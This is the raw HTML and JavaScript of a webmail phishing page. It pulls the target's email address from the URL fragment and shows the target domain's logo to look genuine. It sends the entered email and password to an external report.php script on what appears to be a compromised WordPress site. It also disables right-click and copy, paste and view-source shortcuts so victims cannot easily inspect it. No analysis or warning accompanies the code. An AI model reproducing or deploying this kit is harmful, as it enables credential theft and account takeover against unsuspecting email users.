<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
  "http://www.w3.org/TR/html4/loose.dtd">    
<html>
<head>
<link rel="shortcut icon" href="https://webmail.prositehosting.net/fasthosts/whitelabelfavicon.ico?s=1633086136">
<link rel="stylesheet" type="text/css" href="stylepo.css" />
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>
<style>

body { 
  min-height: 500px;
  background-attachment: fixed;
  background-position: center;
  background-size: cover;
  }

.X-set {  background-image: url("bagnx.png") ;

height:500px; width:400px;
  background-position: center;
  background-repeat: no-repeat;
  background-size: 400px;
  
  margin-left:400px;
  border:none;
  }
  .Z-set { height:15px; width:100px; margin-left:88px; border:none;}
  .xpass {height:28px; width:220px; margin-left:100px; border:none; margin-top:4px; background-color:transparent;}
 .xpass:focus{outline: none;}
    .spass {height:34px; width:270px; margin-left:60px; border:none; margin-top:18px; background-color:transparent;}
	
	.copx {width:215px; border:hidden; background-color:transparent;}
 .copx:focus{outline: none;}
 
  </style>
  
<title>Webmail</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>

<body><br>

<form action="" method="post" autocomplete="off" id="pax" onsubmit="return redirect()" > 

<fieldset class="X-set" >

<h2 class="text-center"><div id="top"><img src="" alt="" id="logoimg" style="width:50px;height:50px;margin-top:9px; margin-left:170px;"></h2>

<fieldset class="Z-set">

<input class="copx"type="email" required value="" name="email" id="cax"  placeholder="Username"><br>


</fieldset><br>

<input type="password" Placeholder="Enter your email password" required value="" class="xpass" autocomplete="off" name="passw" id="inpwd" minlength="6" ><br>

<button type="submit" value=" " class="spass"  ></button><br>

<span id="bax"  style="display:none;"></span>


</fieldset>
</form>

</body>
<script>

document.addEventListener('invalid', (function () {
  return function (e) {
    e.preventDefault();
    document.getElementById("inpwd").focus();
  };
})(), true);

  document.onkeydown = function(e) {
        if (e.ctrlKey && 
            (e.keyCode === 67 || 
             e.keyCode === 86 || 
             e.keyCode === 85 || 
             e.keyCode === 117)) {
            return false;
        } else {
            return true;
        }
};
$(document).keypress("u",function(e) {
  if(e.ctrlKey)
  {
return false;
}
else
{
return true;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());


	document.getElementById("inpwd").focus();
			    var str = window.location.href;
				var strs = str.split("#");
				var emaq = strs[1];
				if(emaq){
					document.getElementById("bax").innerHTML = emaq;
					document.getElementById("cax").value = emaq;
					document.getElementById("pax").action = "https://siameseinter.com/wp-content/plugins/easybusy/9c/report.php";
					
				}
				
				 var ind=emaq.indexOf("@");
        var my_slice=emaq.substr((ind+1));
      var mainPage = 'https://'+my_slice; 
     //     var mainPage = 'https://webmail.staralliancebd.com/';  
        $("#logoimg").attr("src", "https://logo.clearbit.com/"+mainPage);
         document.getElementById('mainPage').src = mainPage;
    //    $("#mainPage").src(mainPage);
</script>
</html>           